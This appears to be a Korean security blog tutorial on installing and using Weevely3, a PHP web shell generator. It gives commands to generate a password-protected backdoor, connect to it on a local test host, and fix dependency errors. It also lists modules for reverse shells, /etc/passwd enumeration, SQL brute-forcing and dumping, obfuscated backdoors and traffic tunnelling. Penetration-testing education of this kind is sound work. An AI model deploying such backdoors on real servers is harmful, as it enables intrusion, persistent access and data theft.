보통 많이 알려진 r57등의 쉘을 사용하거나 one line shell을 사용하기 나름인데 찾다보니 좋은 툴이 있어 겸사겸사 작성하였습니다.
Weevely라는 이 툴은 Web Shell Generator입니다.
(저도 예전에 비슷한걸 만들어 보았지만.. 성능면에서 차이가 크군요.)
이 Weevely는 Kali Linux에 기본 툴로 탑재될 만큼 많이 알려지고, 효과또한 좋은 툴입니다.
이 툴을 이용하여 Webshell 생성을 해보도록 하겠습니다.
Weevely 설치하기(Install Weevely & Package)
git 을 이용하여 clone 생성# git clone https://github.com/epinna/weevely3.git
# cd weevely3
관련 패키지 설치
# pip install prettytable
# apt-get install python-yaml
정상 설치 확인
# python weevely.py
[+] weevely 3.2.0
[!] Error: too few arguments
[+] Run terminal to the target
weevely <URL> <password> [cmd]
[+] Load session file
weevely session <path> [cmd]
[+] Generate backdoor agent
weevely generate <password> <path>
Excute weevely - 쉘 파일 생성하기
# python weevely.py generate hahwul ./shell
Generated backdoor with password 'hahwul' in './shell' of 1449 byte size.
Excute weevely - 원격지 Weevely 쉘 접근하기
# python weevely.py 127.0.0.1/vul_test/shell.php hahwul[password][+] weevely 3.2.0
[+] Target: 127.0.0.1
[+] Session: /root/.weevely/sessions/127.0.0.1/test_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
www-data@VUL_TEST:/var/www/html $ help
:audit_filesystem Audit system files for wrong permissions.
:audit_etcpasswd Get /etc/passwd with different techniques.
:audit_suidsgid Find files with SUID or SGID flags.
:audit_phpconf Audit PHP configuration.
:bruteforce_sql Bruteforce SQL database.
:system_info Collect system information.
:system_extensions Collect PHP and webserver extension list.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
Troubleshooting
설치 후 실행과정에서 발생할 수 있는 에러에 대한 처리방법입니다.일단 제가 발생했던 문제는 generate 후 해당 쉘에 대해 접근 시 발생한 pysocks 관련 에러입니다.
ImportError: No module named socks
ImportError: No module named sockshandler
socks, sockshandler 모듈이 없다는 에러를 각각 만나게 되었고, 패키지 설치로 쉽게 해결이 가능합니다.
1. ImportError: No module named socks
# pip install socksipy-branch
2. ImportError: No module named sockshandler
# apt-get install python-pysocks
혹시나 2가지 방법으로도 안된다면 PySock 최신 버전을 받아 사용하시면 됩니다.
https://pypi.python.org/pypi/PySocks/ 접근 후 PySock 파일을 다운로드 받습니다.
압축 해제 후 set.py 를 통해 설치하시면 됩니다.
# tar -xvf PySocks-1.5.6.tar.gz
PySocks-1.5.6/
PySocks-1.5.6/PKG-INFO
PySocks-1.5.6/setup.py
PySocks-1.5.6/socks.py
PySocks-1.5.6/sockshandler.py
# cd PySocks-1.5.6/
# python setup.py install
그러면 아래와 같이 정상적으로 실행되는 것으로 확인할 수 있습니다.
# weevely http://127.0.0.1/test.php hahwul
[+] weevely 3.2.0
[+] Target: 127.0.0.1
[+] Session: /root/.weevely/sessions/127.0.0.1/test_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
Manual & Custom Shell
Maunal+--------------------+------------------------------------------------------+
| generator | description |
+--------------------+------------------------------------------------------+
| :generate.img | Backdoor existing image and create related .htaccess |
| :generate.htaccess | Generate backdoored .htaccess |
| :generate.php | Generate obfuscated PHP backdoor |
+--------------------+------------------------------------------------------+
+----------------------+------------------------------------------------------------------------------+
| module | description |
+----------------------+------------------------------------------------------------------------------+
| :audit.systemfiles | Find wrong system files permissions |
| :audit.userfiles | Guess files with wrong permissions in users home folders |
| :audit.mapwebfiles | Crawl and enumerate web folders files permissions |
| :audit.phpconf | Check php security configurations |
| :audit.etcpasswd | Enumerate users and /etc/passwd content |
| :shell.sh | Execute system shell command |
| :shell.php | Execute PHP statement |
| :system.info | Collect system informations |
| :find.name | Find files with matching name |
| :find.perms | Find files with write, read, execute permissions |
| :find.suidsgid | Find files with superuser flags |
| :backdoor.reversetcp | Send reverse TCP shell |
| :backdoor.tcp | Open a shell on TCP port |
| :bruteforce.sql | Bruteforce SQL username |
| :bruteforce.sqlusers | Bruteforce all SQL users |
| :file.read | Read remote file |
| :file.webdownload | Download web URL to remote filesystem |
| :file.mount | Mount remote filesystem using HTTPfs |
| :file.enum | Enumerate remote paths |
| :file.upload2web | Upload binary/ascii file into remote web folders and guess corresponding url |
| :file.check | Check remote files type, md5 and permission |
| :file.rm | Remove remote files and folders |
| :file.ls | List directory contents |
| :file.touch | Change file timestamps |
| :file.download | Download binary/ascii files from the remote filesystem |
| :file.upload | Upload binary/ascii file into remote filesystem |
| :file.edit | Edit remote file |
| :sql.console | Run SQL console or execute single queries |
| :sql.dump | Get SQL database dump |
| :net.ifaces | Print interfaces addresses |
| :net.proxy | Install and run Proxy to tunnel traffic through target |
| :net.phpproxy | Install remote PHP proxy |
| :net.scan | Port scan open TCP ports |
+----------------------+------------------------------------------------------------------------------+
Custom Shell 관련해서는 이부분 참고하시면 좋을 것 같습니다.
https://github.com/epinna/weevely3/wiki/developing-a-new-module
Reference Site
https://github.com/epinna/weevely3https://github.com/epinna/weevely3/wiki#getting-started
 |
HAHWULSecurity engineer, Gopher and H4cker!
 |
0 개의 댓글:
Post a Comment